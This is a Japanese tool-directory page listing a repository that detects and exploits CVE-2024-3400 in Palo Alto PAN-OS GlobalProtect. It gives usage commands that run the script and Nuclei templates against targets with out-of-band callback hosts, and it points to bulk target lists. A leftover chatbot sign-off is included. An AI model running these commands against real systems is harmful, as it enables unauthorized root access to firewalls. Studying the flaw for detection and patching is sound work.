Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3400 — Nucleiテンプレートとbashスクリプトで、Palo Alto PAN-OS GlobalProtectにおけるCVE-2024-3400のコマンドインジェクションを検出・悪用し、認証なしでのルート権限コード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/schooldropout1337/cve-2024-3400
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubschooldropout1337/cve-2024-3400

CVE-2024-3400

Nucleiテンプレートとbashスクリプトで、Palo Alto PAN-OS GlobalProtectにおけるCVE-2024-3400のコマンドインジェクションを検出・悪用し、認証なしでのルート権限コード実行を可能にします。

リポジトリを見る
6212年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-3400

POC

telemet

説明

特定の PAN-OS バージョンおよび特定の機能構成において、Palo Alto Networks PAN-OS ソフトウェアの GlobalProtect 機能に存在する、任意のファイル作成に起因するコマンドインジェクションにより、認証されていない攻撃者がファイアウォール上で root 権限を持つ任意のコードを実行できる可能性があります。

Cloud NGFW、Panorama アプライアンス、Prisma Access は、この脆弱性の影響を受けません。

Palo Alto PAN-OS 脆弱性向け CVE-2024-3400 Nuclei テンプレート

このリポジトリには、Palo Alto PAN-OS のバグに関連する脆弱性を検出するために設計された Nuclei テンプレートが含まれており、特に CVE-2024-3400 を対象としています。

以下は包括的な調査リストです:

[1] https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis

[2] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

検出される脆弱性

  • 0 バイトファイル作成: この脆弱性により、Bash ファイル内の Curl リクエストを介して 0 バイトのファイルを作成できます。
  • OS コマンドインジェクション: Nuclei テンプレートは、潜在的な OS コマンドインジェクションの脆弱性を検出します。

使用方法

Bash スクリプト

Bash スクリプトを実行するには、次のコマンドを実行します:

root@kitploit:~
./CVE-2024-3400.sh http://target
or
sh CVE-2024-3400.sh http://target

このスクリプトは、ファイルが作成されたかどうかを確認し(200 OK ステータスを返します)。成功した場合、ファイルが存在するかどうかを検証します(403 Forbidden ステータスを返します)。

Nuclei テンプレート - telemet.yaml

  1. Interact サーバーを起動します:
root@kitploit:~
interactsh-client -v
  1. Nuclei テンプレートを実行します:
root@kitploit:~
nuclei -t ./CVE20243400.yaml -u http://target -V telemetry=xyz.oast.fun -debug
  1. Boom Boom テンプレート!(https://dig.pm からサブドメインを取得)
root@kitploit:~
nuclei -t ./telemet.yaml -l pa-urls.txt -V telemetry=subdomain.ipv6.1433.eu.org

潜在的なターゲット

潜在的なターゲットのリストはこちらにあります。

root@kitploit:~
python fofax3r.py

著者

  • 著者: 자전거, 自転車, 自行车
root@kitploit:~

This README.md provides information on the vulnerability, how to use the provided scripts, potential targets, and credits the author. Let me know if you need any further adjustments!
ツールをダウンロード